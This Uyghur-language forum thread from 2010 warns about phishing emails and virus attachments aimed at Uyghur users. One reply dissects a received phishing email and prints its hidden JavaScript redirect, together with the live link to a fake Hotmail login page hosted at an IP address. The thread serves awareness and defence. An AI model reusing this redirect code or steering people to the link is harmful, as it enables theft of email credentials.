ئاگاھ ۋە سەگەك بولۇڭلاركى....

Bidar-Qutlan
يازمىلار: 163
تىزىملانغان ۋاقتى: سەيشەنبە ئاپرىل 03, 2007 4:54 am
ئالاقىلىشىش:

ئاگاھ ۋە سەگەك بولۇڭلاركى....

يازما يوللاش تەرىپىدىن يوللانغان Bidar-Qutlan » يەكشەنبە ئىيۇل 25, 2010 7:19 pm

[size=3]ئىنتېرنېت ۋىرۇسلىرىدىن ساقلىنىش

ئەركىن سىدىق

2007-10-2

1. ئېلخەت ئوغرىلىرىدىن ساقلىنىڭ

سالام ۋەتەنداشلار،

ئالدى بىلەن ھەممىڭلارنىڭ رامازان كۈنلىرىنىڭ كۆڭۈلدىكىدەك ئۆتۈشىگە تىلەكداشلىق بىلدۈرىمەن.

مەن يېقىندا بەزىلەرنىڭ ياھوو ئېلخېتى ئارقىلىق باشقىلارنىڭ ئېلخەت ئىسمى بىلەن پارولى (ئۇسەر ئىد ئاند پاسسۋورد) ئوغۇرلىماقچى بولىۋاتقېنىنى بىر قانچە قېتىم بايقىدىم. شۇڭا بۇ ئىشتىن سىلەرنىمۇ خەۋەردار قىلىپ قويۇش ئۈچۈن بۇ ئۇچۇرنى يېزىۋاتىمەن. ئۇلارنىڭ ئوغۇرلۇق ئۇسۇلى مۇنداق ئىكەن:
ئۇلار سىزنىڭ ياھوو ئېلخېتىڭىزگە بىر ئۇيغۇر نامىدىن بىر ياكى بىر قانچە ئېلخەت ماڭدۇرىدىكەن. ئەگەر سىز ئۇ خەتنى ئوقۇماقچى بولۇپ، ئۇ خەتنىڭ ماۋزۇسىنى چەكسىڭىز، ئىكران ياھوو ئېلخېتىگە ئىسىم بىلەن پارولنى كىرگۈزۈپ كىرىش بېتىگە ئۆزگىرىدىكەن. يەنى، سىز ئالللىقاچان ياھوو ئېلخېتىڭىزگە كىرىپ بولغان بولسىڭىزمۇ، بۇ ئىكران سىزدىن ئىسمىڭىز بىلەن پارولنى قايتا كىرگۈزۈشنى تەلەپ قىلىدىكەن. بۇ ئىكران گەرچە ياھوو ئېلخېتى ئىكرانىغا ئاساسەن ئوخشاش بولسىمۇ، ئۇ ئەسلىدە ياھوو نىڭ بولماستىن، باشقىلار تەرىپىدىن ياسالغان ئىكران ئىكەن. ئەگەر سىز بۇ قېتىم ئىسمىڭىز بىلەن پارولىڭىزنى قايتا كىرگۈزسىڭىز، بۇ ئۇچۇر ئۇتتۇرلام ھېلىقى ئوغۇرلارغا كېتىپ قالىدىكەن.

بۇنى مەن مۇنداق بىلدىم: يېڭى بىر ئىكران ئەچىلغاندىن كېيىن، مەن “باچك” دىگەن يەرنى چېكىپ، ئەسلىدىكى ئورنۇمغا قايتىپ كەتمەكچى بولسام، بۇ ئىە (ئىنتەرنەت ئەخپلورەر) دېتالى ئۇنىڭغا يول قويماي، ئاشۇ يېڭى ئىكراندا تۇرىۋالدى. شۇنىڭ بىلەن مەن ئىنتەرنەت تور بېتى ئادرىسىنى كىرگۇزىدىغان ئورۇنغا ۋۋۋ.ياھوو.چوم نى قايتا كىرگۈزۈپ، ئاندىن “ماىل” نى تاللىسام، مەن ئۆزەمنىڭ ئەسلىدىكى ئەلخەت ئىكرانىمغا كېرەلىدىم. يەنى، ياھوو مەندىن ئىسمىم بىلەن پارولىمنى قايتا كىرگۈزۈشىمنى تەلەپ قىلمىدى.

نورمالنى ئەھۋالدا ياھوو ئېلخەتى ھەرگىز سىزدىن بىر ئېلخەتنى ئوقۇش ئۈچۈن ئىسمىڭىز بىلەن پارولىڭىزنى قايتا كىرگۈزۈشنى تەلەپ قىلمايدۇ. ئەگەر ئاشۇنداق تەلەپ قىلىپ قالسا، ئۇ مەن يوقۇرىدا ئېيتقان ئېلخەت ئوغۇرلىرىنىڭ ھەركىتى ئىكەنلىگىدىن دېرەك بېرىدۇ. شۇڭا بۇ ئىشقا ئالاھىدە دىققەت قىلىڭ. ئەگەر سىز بۇرۇن بىر ئېلخەتنى ئوقۇش ئۈچۈن ئىسمىڭىز بىلەن پارولىڭىزنى قايتا كىرگۈزۈپ باققان بولسىڭىز، ئەڭ ياخشىسى پارولىڭىزنى ئۆزگەرتىۋېتىڭ. ئۇنداق قىلمىسىڭىز سىزنىڭ خەتلىرىڭىزنى ھېلىقى ئېلخەت ئوغۇرلىرىمۇ تەڭ كۆرۈپ تۇرىدۇ.

مەن بۇ ھادىسىنى ھازىرغىچە پەقەت ياھوو ئېلخېتىدىلا ئۇچراتتىم. ئەگەر باشقا ئېلخەتلەردىمۇ ئاشۇنداق ھادىسە كۆرۈلسە، ئۇمۇ ئېلخەت ئوغۇرلىرىنىڭ قىلغىنى بولىشى مۇمكىن.

ماڭا بۈگۈن ئېلخەت ئوغۇرلىرىنىڭ خېتىدىن ئىككىسى كەلدى. ئۇنىڭ بىرسى ”ئۇسا.ئۇيغۇر” دىن كەلگەن بولۇپ، ماۋزۇسى:”دونت فورگەت!-پلەاسە ئاتتەند تھە مەەتىڭ پۇنچتۇاللي. ”

يەنە بىرسى “ئەنۋارجان” دىن بولۇپ، ماۋزۇسى: “سالام”

2. ئىنتېرنېت ۋىرۇسلىرىدىن ساقلىنىش ئۇسۇلى

قېرىندىشىمىز “قايتماس” يوقۇرىدا ئىنتېرنېتتە ئۇچرايدىغان، مەن تېخى توختالمىغان بىر خىل ۋىرۇس نى تىلغا ئاپتۇ. ئىنتېرنېت ۋىرۇس لىرىدىن دىگەندەك ساۋادى يوق ۋەتەنداشلارغا پايدىسى بولسۇن ئۈچۈن، مەن بۇ خىل ۋىرۇستىن ساقلىنىش ئۇسۇلى توغرىسىدىمۇ توختۇلۇپ ئۆتەي. يەنە بىر قانچە كۈننىڭ ئىچىدە بۇ يازمامنىڭ 3-قىسمى، يەنى “ئىنتېرنېت ۋىرۇسلىرىدىن ساقلىنىش ئۇسۇللىرى (3)>، نى مۇشۇ مۇنبەرگە چىقىرىمەن.

مېنىڭ مەرىپەتتىكى ئېلخەت ساندۇقۇمغا “داشقال ئېلخەتلەر” ئىنتايىن كۆپ كەلىدىغان بولۇپ كەتكەنلىگى ئۈچۈن، بۇ يىل ئەتىيازدا مەن “گماىل.چوم” دىن بىر ئېلخەت ساندۇقى ئالدىم (بۇ ساندۇققا پۇل ئېلىنمايدۇ). شۇ كۈنى ۋەتەندىكى بىر ئوقۇغۇچىغا يازغان جاۋاب خېتىمنى مۇشۇ ئېلخەت ئادرىسى ئارقىلىق ماڭدۇردۇم. ئەتىسى قارىسام، خۇددى بۇرۇنقىغا ئوخشاشلا، بۇ ساندۇققا جۇڭگودا چەكلەنگەن سىياسىي مەزمۇننى ماۋزۇ قىلغان بىر ھۆججەت چاپلانغان ئېلخەتتىن بىرسى كېلىپتۇ. بۇ خەتنى ماڭدۇرغان كىشىنىڭ ئىسمىمۇ ئۇيغۇرنىڭ ئىسمى ئىكەن. ماڭا بۇ ئېلخەت ساندۇقىنى ئالغىلى تېخى ئاران بىر كۈن بولغان بولغاچقا، مەن بۇ ئىشقا قاراپ، “جۇڭگو بىلەن چەت ئەل چىگرىسىدا مەخسۇس گماىل دىن كەلگەن ئېلخەتلەرنى نازارەت قىلىپ تۇرىدىغان ئادەملەر باركەن”، دىگەن خۇلاسىغا كەلدىم. شۇنىڭ بىلەن مەن ھەر ئايلىغى پۇل تۆلەيدىغان پۇللۇق ئېلخەت مۇلازىمەت شىركىتىدىن يېڭى ئېلخەت ساندۇقىدىن بىرنى ئالدىم. ھەمدە ۋەتەندىكى 2 تونۇشۇمغا بۇنىڭدىن كېيىن مەن بىلەن مۇشۇ يېڭى ئېلخەت ئادرىسى ئارقىلىق ئالاقىلىشىش توغرىسىدا ئېلخەت ماڭدۇردۇم. ئەمما، 2-كۈنى قارىسام، مەن ئاچقان بۇ يېڭى ئېلخەت ساندۇقىغىمۇ ھەلىقىدەك چاپلانما بار خەتتىن بىر قانچىسى كېلىپ بوپتۇ. بۇ ئىشتىن مەن مۇنداق خۇلاسىغا كەلدىم: جۇڭگو بىلەن چەت ئەل چىگرىسىدا، چەت ئەلدىن كەلگەن ھەممە ئېلخەتلەرنى نازارەت قىلىپ تۇرىدىغان ئادەملەر بار ئىكەن. ئادەتتە ماڭا ۋىرۇس بار ھۆججەت چاپلانغان ئېلخەت كەلگەندە، ئوخشاش بىر ئېلخەت مەن ۋەتەندىكىلەر بىلەن ئالاقە قىلىش ئۈچۈن ئىشلىتىدىغان ئېلخەت ساندۇقلىرىمنىڭ ھەممىسىگە تەڭلا كېلىدۇ. دىمەك، ھېلىقى نازارەتچىلەر مېنىڭ ۋەتەندىكىلەر بىلەن ئالاقىلىشىدىغان ھەممە ئېلخەت ساندۇقلۇرۇمنى بىلىپ تۇرىدىكەن.

سىزگە بىر ئۇيغۇر نامىدا ئېلخەت يوللاپ، ئۇ ئېلخەت ئارقىلىق سىزگە جۇڭگودا چەكلەنگەن سىياسىي مەزمۇندىكى بىر ھۆججەتنى ماڭدۇرۇشتا، بۇ ئىشنى قىلىۋاتقانلارنىڭ مۇنداق 2 مەقسىدى بار:

1. سىزنىڭ كومپيۇتېرىڭىزنى بۇزۇپ تاشلاش. نۇرغۇن ئۇيغۇر قېرىنداشلىرىمىز مانا مۇشۇنداق سۈيىقەستلەرنىڭ قۇربانى بولۇپ كەتتى. سىزگە كەلگەن بۇنداق ھۆججەتلەرنىڭ ماۋزۇسى كىشىنى ئىنتايىن قىزىقتۇرىدىغان بىر مەزمۇندا بولۇپ، ئۇنىڭغا ۋىرۇس قاچىلانغان بولىدۇ. سىز ئۇنى ئوقۇپ باقماقچى بولۇپ، ھۆججەتنىڭ ئىسمىنى چەكسىڭىز، كومپيۇتېرىڭىز ۋەيران بولىدۇ. شۇڭا، بۇنداق قىلتاققا چۈشمەسلىك ئۈچۈن، ھەرگىز سىز تونۇمايدىغان بىرەرسىدىن كەلگەن خەتتىكى ھۆججەتنى ئاچماڭ. ئەگەر سىز سىزگە بۇ خەتنى ماڭدۇرغان كىشىنى تونۇسىڭىز، ئۇ ھۆججەتنى ئېچىشتىن بۇرۇن سىز چوقۇم ئالدى بىلەن ئاشۇ كىشىگە بىر تېلېفون قىلىپ، ياكى ئۇنىڭغا بىر مەخسۇس ئېلخەت ماڭدۇرۇپ، بۇ ئېلخەتنى شۇ كىشىنىڭ سىزگە ئىۋەرتكەن-ئىۋەرتمىگەنلىگىنى سوراپ بېقىڭ. بۇ قەدەمنى باسماي تۇرۇپ ئۇ ھۆججەتنى ھەرگىز ئاچماڭ.

باشقىلارنىڭ كومپيۇتېرسىنى بۇزۇپ قويماسلىق ئۈچۈن،سىزمۇ ئىمكان قەدەر باشقىلارغا چاپلانما ھۆججەت ماڭدۇرماي، ماڭدۇرماقچى بولغان نەرسىنى ئېلخەتنىڭ ئىچىدىكى تېكىست شەكلىدە ماڭدۇرۇڭ. ئەگەر چوقۇم چاپلانما ھۆججەت شەكلىدە ماڭدۇرۇشقا توغرا كەلسە، چوقۇم قارشى تەرەپكە تېلېفون ياكى ئېلخەت ئارقىلىق ئالدىن خەۋەر بېرىپ قويۇڭ. مەن ھەچ قانداق ئادەمگە بىكاردىن-بىكار چاپلانما ھۆججەت ماڭدۇرمايمەن. شۇڭا سىزگە مېنىڭ نامىمدا چاپلانما ھۆججەت كېلىپ قالسا، ئۇنى ھەرگىز ئاچماڭ.

2. سىزنى قورقۇتۇپ، سىزنى چەت ئەلدىكىلەر بىلەن ھەچ قانداق ئېلخەت ئالاقىسى قىلماسلىققا مەجبۇرلاش. چەت ئەلدىكىلەر بىلەن نورمالنى ئېلخەت ئالاقىسى قىلىش ھەچ قانداق دۆلەتنىڭ قانۇنىغا خىلاپلىق ئىش ئەمەس. سىزگە باشقىلاردىن سىياسىي مەزمۇنددىكى ھۆججەت چاپلانغان ئېلخەت كەلسە، ئۇ ھەرگىزمۇ سىزنىڭ سەۋەنلىگىڭىز ئەمەس. بولۇپمۇ مەنىڭ ھازىرغا قەدەر باشتىن كەچۈرگەن سەرگۈزەشتىلىرىمگە ئاساسلانغاندا، ماڭا باشقىلار پەقەت مەنىڭ كومپيۇتېرىمنى بۇزۇپ تاشلاش ئۈچۈنلا ھەلىقىدەك ئېلخەتلەرنى ماڭدۇرىۋاتىدۇ. ماڭا ئۇنداق ئېلخەتلەردىن ھەر كۈنى بىر قانچىسى كېلىپ تۇرىۋاتىدۇ. سىز بۇنداق نەرسىلەرنى تاپشۇرۇپ ئالغاندا ھەرگىز قورقۇپ كەتمەي، ئۇنى دەرھال ئۆچۈرۋېتىڭ. ياكى مەن يوقۇرىدا چۈشەندۈرۈپ ئۆتكەن تەدبىرنى قوللۇنۇڭ. ئەگەر سىزگە سىياسىي مەزمۇندىكى ھۆججەت كەلگەنلىگى تۇپەيلىدىن ئېلخەت ئىشلىتىشتىن ۋاز كەچسىڭىز، سىز دەل باشقىلارنىڭ قىلتىقىغا چۈشكەن بولىسىز.

بۇ ئىشتا ئەڭ مۇھىم مەسىلە ئۆز-ئۆزىنى تەربىيىلەش، ئۆز-ئۆزىنى زۆرۈر بىلىم بىلەن قورانلاندۇرۇش. شۇنداق قىلسىڭىز يامان نىيەتلىك رەزىل كىشىلەرنىڭ قۇربانىغا ئايلانماي، ھازىرقى ئەڭ ئىلغار تەخنولوگىيەنىڭ بىر ۋەكىلى بولغان ئىنتېرنېتتىن سىزمۇ ئۆنۈملۇك پايدىلىنالايسىز.

مەن كومپيۇتېردىن ۋە ئىنتېرنېت ۋىرۇسلىرىدىن بىر ئاز خەۋىرى بار قېرىنداشلارنىڭ ھەممىسىنىڭ باشقىلارغا ئۈگىتىش، باشقىلارنى تەربىيىلەش بۇرچى بار، دەپ قارايمەن. شۇنداق ئىدىيەنىڭ يېتەكچىلىگىدە بۇ يازمىنى تەييارلىدىم. كام قالغان جايلىرىنى باشقا قېرىنداشلارنىڭ تولۇقلاپ كېتىشىنى سورايمەن. شۇنداقلا تورداشلارنىڭ مۇشۇنداق مەزمۇنلارنى باشقا تور بەتلىرىدىمۇ ئېلان قىلىپ، ئىمكانقەدەر كۆپرەك كىشىلەرنىڭ بۇ ئىشلاردىن خەۋەر تەپىشىغا ياردەم قىلىشىنى سەمىمىيلىك بىلەن سورايمەن.

يوقۇرقى “ئىنتېرنېت ۋىرۇسلىرىدىن ساقلىنىش ئۇسۇللىرى (2)” دىگەن مەزمۇن توغرىسىدا قىسقىچە ئەسكەرتىش:

ھازىرقى تەخنولوگىيە نۇقتىسىدىن ئەلىپ ئەيتقاندا، چىگرىدىن چىقىپ-كىرىۋاتقان ئەلخەتلەرنىڭ مەزمۇنىنى كورۇپ تەكشۇرۇش پۇتۇنلەي مۇمكىن. لەكىن بۇنداق قىلىش خەلە كوپ ماددىي كۇچ تەلەپ قىلىدىغان بولۇپ، بىر ھوكۇمەت چەگرادىن چىقىپ-كىرىۋاتقان ھەممە ئەلخەتلەرنىڭ مەزمۇنىنى تەكشۇرۇپ تۇرىشى ناتايىن. لەكىن، مۇشۇنداق ئەلخەتلەرنىڭ ھەممىسىنىڭ ئەلخەت ساندۇق ئادرىسىنى تىزىملىۋەلىش ئانچە قىيىن بولماسلىغى مۇمكىن. شۇڭلاشقا، سىزنىڭ ئارتۇقچە ئەنسىرەپ كەتىشىنىڭىزنىڭ ھاجىتى يوق. ئەلخەتنى نورمال ھالدا ئىشلىتىۋاتقانلىغىڭىز توغرىسىدا ئوز-ئوزىڭىزگە ئىچەنچىڭىز بولسا، ھەرگىز باشقىچە ئەنسىرەپ كەتمەڭ، ھەمدە ئەلخەت ئىشلىتىشتىن ۋاز كەچىپ يۇرمەڭ. كىمنىڭ نىمە ئىش قىلىۋاتقانلىغىنى ھەلىقىدەك ناچار نەرسىلەرنى ماڭدۇرىۋاتقانلار ھەممىدىن بەك بىلىدۇ.[/size]
[url]http://uyghuracademy.com/?p=9433[/url]


بۇ ماقالا ئېلان قىلىنغىنىغىمۇ 2 يېرىم يىل بولۇپ قاپتۇ، ئەينى چاغدا كۆپلىرىمىز بۇ ماقالىنى كۆرۈپ بولغان بولىشىمىز مۇمكىن، ماقالىدا دېيىلگەن بىر ئىش مېنىڭ كومپيۇتېرىمدا يېقىندا يۈزبەردى، ئەپسۇس، ماقالىدىكى بۇ مەزمۇنلار ئېسىمدىن كۆتۈرلۈپ كەتكەنمۇ ياكى ئۇچاغدا بۇنداق ئىشنى بېشىمدىن ئۆتكۈزمىگىنىم ئۈچۈن ئانچە دىققەت قىلمىغانمۇ قانداق، بۇزغۇنچى ئەبلەخلەرنىڭ قىلتىقىغا چۈشۈپتىمەن، ئۈچ ھەپتە ئىلگىرى خوتمائىلدكى مەنسەنجىرغا بىر ناتونۇشتىن خەت كەپتۇ، ئېچىپ قاراپ باقاي دەپ خەتنىڭ ماۋزۇسىنى چەكسەم، ئېلخەتداننىڭ ئىسىم ۋە ئىم كىرگۈزىدىغان كۆزنىكى ئېچىلدى، قىلتاققا چۈشۈپ كىرگۈزۈپتىمەن، ئۇ خەت پەقەت ئېچىلىپ باقمىدى، يەنە شۇ ئىسىم بىلەن ئىمنى سوراپ تەكرار ئەۋارە قىلىۋەردى، ئەمدە بىلسەم ئوغرىنىڭ خېتىكەن ئەمەسمۇ؟
ھەممىمىزنىڭ ھۇشيارلىقىمىزنى ئۆستۈرۈپ، بىنۇمۇس دۈشمەنلەرنىڭ قىلتىقىغا چۈشۈپ كەتمەسلىكىمىزنى تىلەيمەن.

[[i] بۇ يازمىنى ئاخىرقى قېتىم تەھرىرلىگۈچى: Bidar-Qutlan ، ۋاقتى: 2010-7-26 01:27 [/i]]



Bidar-Qutlan
يازمىلار: 163
تىزىملانغان ۋاقتى: سەيشەنبە ئاپرىل 03, 2007 4:54 am
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان Bidar-Qutlan » جۈمە ئىيۇل 30, 2010 4:35 pm

مەن يۇقۇرىدا تىلغا ئالغان خەتنىڭ مەزمۇنىنى زادى ئوقۇشقا ئىمكان بولمىدى، ھەرقېتىم خەتنىڭ ئىسمىنى چەككىنىمدە قايتىدىن خەتدانغا كىرىش بوسوغىسىغا قايتىۋىلىپ، ئىسىم بىلەن ئىمنى كىرگۈزگىلى سالاتتى، قانداق بىر ئۇسۇلنى قوللانغىنىم ئىسىمدە يوق، بۇ خەتتىن تۆۋەندىكى ئۇچۇرغا ئىگە بولدۇم، بۇلارنى نېمە دەپ ئاتاشنىمۇ بىلمەيمەن، ئۇستازلارنىڭ كۆرۈپ بېقىشى ئۈچۈن تۆۋەندە چاپلاپ قويدۇم. خەتنىڭ ئۆزىنى ئۆچۈرىۋەتتىم:
[ltr]Murathanturkt... Uighur matter in te Nether... 9KB

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtTQ0w9MA==
X-Message-Status: n:0
X-SID-PRA: [email]murathanturktens@gmail.com[/email]
X-SID-Result: Pass
X-AUTH-Result: PASS
X-Message-Info: NDMZeIBu+srEiHb/Y0EbMn0KvH6O8D1FxvziBFSzemI6sC4O8XGQdKQFeEoqCfF++MyzOFNavQ/PpjsSyyPPgWz1YzfMxe25MnD4rMKUCGc=
Received: from mail-yw0-f67.google.com ([209.85.213.67]) by col0-mc1-f45.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);

Muhammad
يازمىلار: 7
تىزىملانغان ۋاقتى: جۈمە ئاپرىل 06, 2007 4:32 am
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان Muhammad » جۈمە ئىيۇل 30, 2010 10:09 pm

ئەسسالامۇ ئەلەيكۇم،

[quote]مەن يۇقۇرىدا تىلغا ئالغان خەتنىڭ مەزمۇنىنى زادى ئوقۇشقا ئىمكان بولمىدى، ھەرقېتىم خەتنىڭ ئىسمىنى چەككىنىمدە قايتىدىن خەتدانغا كىرىش بوسوغىسىغا قايتىۋىلىپ، ئىسىم بىلەن ئىمنى كىرگۈزگىلى سالاتتى...[/quote]

بۇ خەتنىڭ X-Message-Delivery دىن تارتىپ This is a multi-part message in MIME format دېگەنگىچە بولغان قىسىمى ئېلخەتكە مۇناسىۋەتلىك ئۈچۈرلار: قەيەردىن كەلدى، ئەۋەتكۈچى پروگرامما، دېگەندەك.

بۇ خەتنىڭ ئۇنىڭدىن كىيىنكى قىسىمىدا تۆۋەندىكى تېكىست بۆلىكى ئۈچ قېتىم ئۇچرايدۇ:
[align=left]
------=_NextPart_000_0004_01CB2447.FE16B4D0[/align]

بىرىنچى قېتىم ئۇچرىغان جايدىن ئىككىنچى قېتىم ئۇچرايدىغان جايغىچە بولغىنى تۆۋەندىكى ئىنگىلىزچە تېكىست:
[align=left]
Dear Mr. Seytoff and Kanat,

I had contact with an antropologist Pal Nyiri at the Vrije Univerity before the symposium on 30th of March. I thought maybe you would be interested in reading his statements about the Uyghur matter.
...
...
[/align]

يەنى بىر قىسىم سىياسي گەپلەر.

ئالدىن ئېيتىلغان تېكىست بۆلىكىنىڭ ئىككىنچى ۋە ئۈچىنچى قېتىم ئۇچرايدىغان جايلىرىنىڭ ئوتتۇرىسىغا قويۇلغىنى يۇقىرىقى تېكىست بىلەن ئاساسەن ئوخشاش، لېكىن ئەڭ ئاخىرقى قىسىمىدا تۆۋەندىكى كود بار (پەدازلىرىنى ئېلىپ تاشلانغاندىن كىيىن):

[align=left]
eval(window.location.replace('http://206.191.132.74/sn123w.snt123.mail.live.com/hotmail.htm'))
[/align]
بۇ كودنىڭ مەقسىتى سىزنىڭ تور كۆرگۈچىڭىزنى تۆۋەندىكى ئادرىسقا ئېلىپ بارماقچى:

[url=http://206.191.132.74/sn123w.snt123.mail.live.com/hotmail.htm]http://206.191.132.74/sn123w.snt123.mail.live.com/hotmail.htm[/url]

يۇقىرىقى بەتكە بارسىڭىز Hotmail نىڭ 206.191.132.74 دېگەن IP ئادرېسقا قويۇلغان ساختا، كۆچۈرۈلمە نۇسقىسىنى كۆرىسىز. ئەگەر ئۆزىڭىز ئېيتقاندەك بۇ بەتتە ئىسىم ۋە ئىم ئۇچۇرلىرىڭىزنى كىرگۈزگەن بولسىڭىز، بۇ ئۇچۇرلىڭىز باشقىلار تەرىپىدىن ئوغۇرلانغان بولىشى مۇمكىن. بۇلارنى ئۆزگتىۋىتىشىڭىزنى تەۋسىيە قىلىمەن.

سالام بىلەن،

مۇھەممەد ئابدۇللا

Bidar-Qutlan
يازمىلار: 163
تىزىملانغان ۋاقتى: سەيشەنبە ئاپرىل 03, 2007 4:54 am
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان Bidar-Qutlan » شەنبە ئىيۇل 31, 2010 4:50 am

ۋە ئەلەيكۇم ۋەسسالام مۇھەممەت ئابدۇللا ئۇستاز.
سىزنىڭ شۇنچە ئالدىراشچىلىق ئىچىدە ۋاقىت چىقىرىپ بۇ تىمىغا كۆڭۈل بۆلگىنىڭىزگە ھەشقاللا.
سىزنىڭ يۇقۇرىدا ئېيتقانلىرىڭىز، بۇ تىمىنىڭ بېشىدا ئەركىن سىدىق ئەپەندىم دېگەن سۆز بىلەن ئوخشاش چىقتى.
شەخسنىڭ ئۇچۇر مەخپىيەتلىكى قالمىغان بۇ مەدەنىي دۇنيادا بۇ مەلئۇنلار بۇنداق پەسكەشلىك قىلىپ يەنە نېمىگە ئىرىشمەكچىكىنە؟


گوگۇلدىن ئالغان خەت ساندۇقىمغىمۇ يېقىندىن بېرى ئېنگىلىزچىمىكىن بىلمىدىم كۈنىگە بىرقانچە پارچە خەت كىلىدىغان بولىۋالدى، ئۇلارنىڭ مەزمۇنىنى قىلچە بىلمىگىنىم ئۈچۈن، ئوقۇمايلا ئۆچۈرۈپ مېڭىۋاتقان بولساممۇ كىلىشتىن ھىچ توختاپ قالمىدى، بۇ خەتدانىمدىن ۋازكەچكىلى ئازلا قىلىۋاتىمەن، ئۇنداق ئادرسنى گوگۇلدا قاراتىزىملىككە كىرگۈزگىلى بولىدىغان ئامال يوقمىدۇ؟

[[i] بۇ يازمىنى ئاخىرقى قېتىم تەھرىرلىگۈچى: Bidar-Qutlan ، ۋاقتى: 2010-7-31 10:57 [/i]]

kaqkuz
يازمىلار: 20
تىزىملانغان ۋاقتى: سەيشەنبە ئىيۇل 31, 2007 5:12 pm
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان kaqkuz » دۈيشەنبە ئاۋغۇست 02, 2010 3:01 am

ئادەتتە ئېلخەت پىروگراممىلىرىنىڭ نورمال ئىقتىدارى بويىچە، بۇنداق ئېلخەتلەر ئەخلەت قاتارىدا ئاپتوماتىك بىر تەرەپ قىلىناتتى. ناۋادا بىر تەرەپ قىلمىسا، سىز ئاشۇ خەتنىڭ ئۈستىدىكى 这是垃圾邮件 دىگەن بۇيرۇقنى بىسۋەتسىڭىز قايتا كەلمەيدۇ.
مەنمۇ گوگۇلنىڭ مۇشۇ كاشىلىسىدىن بىزار بولۇپ، ئاخىرى Gmailنى بىۋاستە ئىشلەتمەس بولدۇم. بەزى بىر تورلاردا ماتېريالىمدا شۇ بولغانلىقى ئۈچۈنلا QQ نىڭ خەت ساندۇقىنى، Gmail نىڭ ئېلخەتلىرىنى ۋاكالىتەن تاپشۇرۋالىدىغان تەڭشەپ قويدۇم، بۇنداق بولغاندا ئېلخەتلەر، ئېككى ئەلگەكتىن ئۆتۈپ، ئەخلەتتىن ئاساسەن قۇتۇلغىلى بولىدۇ. ئىشقىلىپ، yahoo، msn ۋە gmail لار ئەخلەتخانىغا ئايلىنىپ قىلۋاتىدۇ. شۇڭا مەن سىزنىڭمۇ دۆلەت ئىچىدىكى ئېلخەت ساندۇقلرىنى ئىشلىتىشىڭىزنى تەۋسىيە قىلىمەن. مەسىلەن: 126 نىڭ ساندۇقى ياكى 163نىڭ ھەقلىق ساندۇقى (بۇلاردا ئېلخەت كەلسە يانفۇنغا ھەقسىز ئۇچۇر ئەۋەتىدۇ.). سىز QQنىڭ ھەقلىق ئەزاسى بولغاندىكىن QQنىڭ VIP خەت ساندۇقىنى ئېلىش ھوقوقىڭىز بار، بۇمۇ ناھايىتى ياخشى. مەن ھازىر %95 مۇشۇ QQنىڭ VIP ساندۇقىنى ئىشلىتىۋاتىمەن. :)

oghuzkb
يازمىلار: 28
تىزىملانغان ۋاقتى: چارشەنبە ماي 21, 2008 1:30 pm
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان oghuzkb » دۈيشەنبە ئاۋغۇست 02, 2010 9:11 am

مەن يەنىلا كۆپچىلىككە GnuPG ئىشلىتىشنى قاتتىق تەۋسىيە قىلىمەن، بۇ ئارقىلىق ئىلخەت مەزمۇنىنى راۋرۇس شىفىرلىغىلى بولىدۇ، ھەم بۇ خىل شىفىرىنى يىشىش ئۈچۈن ھازىرقى تېخنىكىدا ئاز دىگەندىمۇ 50~60 يىل كىتىشى مۇمكىن. بۇ دېتال ھەققىدە بىلىك مۇنبىرىدە مەخسۇس تېما ھەم بار ئىدى...

[url]http://www.gnupg.org/[/url]

Bidar-Qutlan
يازمىلار: 163
تىزىملانغان ۋاقتى: سەيشەنبە ئاپرىل 03, 2007 4:54 am
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان Bidar-Qutlan » دۈيشەنبە ئاۋغۇست 02, 2010 4:54 pm

[quote]ئەسلى يوللىغۇچى: [i]oghuzkb[/i] ، ۋاقتى: 2010-8-2 15:11 [url=http://www.ukij.org/munber/redirect.php?goto=findpost&pid=3115&ptid=577][img]http://www.ukij.org/munber/images/common/back.gif[/img][/url]
مەن يەنىلا كۆپچىلىككە GnuPG ئىشلىتىشنى قاتتىق تەۋسىيە قىلىمەن، بۇ ئارقىلىق ئىلخەت مەزمۇنىنى راۋرۇس شىفىرلىغىل ... [/quote]
سىز تەۋسىيە قىلغان تور بەت چەتچىكەن، مۇمكىن بولسا ئىشلىتىش ئۇسۇلىدىن تەلىم بەرسىڭىز.

Bidar-Qutlan
يازمىلار: 163
تىزىملانغان ۋاقتى: سەيشەنبە ئاپرىل 03, 2007 4:54 am
ئالاقىلىشىش:

يازما يوللاش تەرىپىدىن يوللانغان Bidar-Qutlan » دۈيشەنبە ئاۋغۇست 02, 2010 5:04 pm

[quote]ئەسلى يوللىغۇچى: [i]kokkaptar[/i] ، ۋاقتى: 2010-8-2 09:01 [url=http://www.ukij.org/munber/redirect.php?goto=findpost&pid=3107&ptid=577][img]http://www.ukij.org/munber/images/common/back.gif[/img][/url]
ئادەتتە ئېلخەت پىروگراممىلىرىنىڭ نورمال ئىقتىدارى بويىچە، بۇنداق ئېلخەتلەر ئەخلەت قاتارىدا ئاپتوماتىك بىر ... [/quote]
مەنمۇ ئادەتتە بۇئېلخەتدانىمنى كۆپ ئىشلەتمەيمەن، ئادەتتە ئىشلىتىدىغىنىم سىنادىن ئالغىنىم، كىۇكىۇ ۋە 163كە بولغان ئىشەنچىم تۆۋەنلەپ كەتتى، نەچچە يىل ئىشلەتكەن كىۇكىۇرىممۇ سەۋەپسىزلا يوقالدى، [email]zrpxn@163.com[/email]نىمۇ 6، 7 يىلدىن بىرى ئىشلىتىپ كىلىۋاتقان ئىدىم، ئەپسۇس بۇمۇ يوق بولۇپتۇ، ئەمما gmail, msn لاردىن ئالغانلىرىم ئەخلەتخانىغا ئايلانغان بولسىمۇ، يوقالماپتۇ، شۇڭا بۇلار مەندىن ۋاز كەچمىگەنلىكى ئۈچۈن، مېنىڭمۇ ئادەتتە ئىشلەتمىسەممۇ ۋازكەچكىم كەلمىدى. كۆپ ھاللاردا sina.cn ئات Qutlan نى ئىشلىتىپ كىلىۋاتىمەن.

oghuzkb
يازمىلار: 28
تىزىملانغان ۋاقتى: چارشەنبە ماي 21, 2008 1:30 pm
ئالاقىلىشىش:

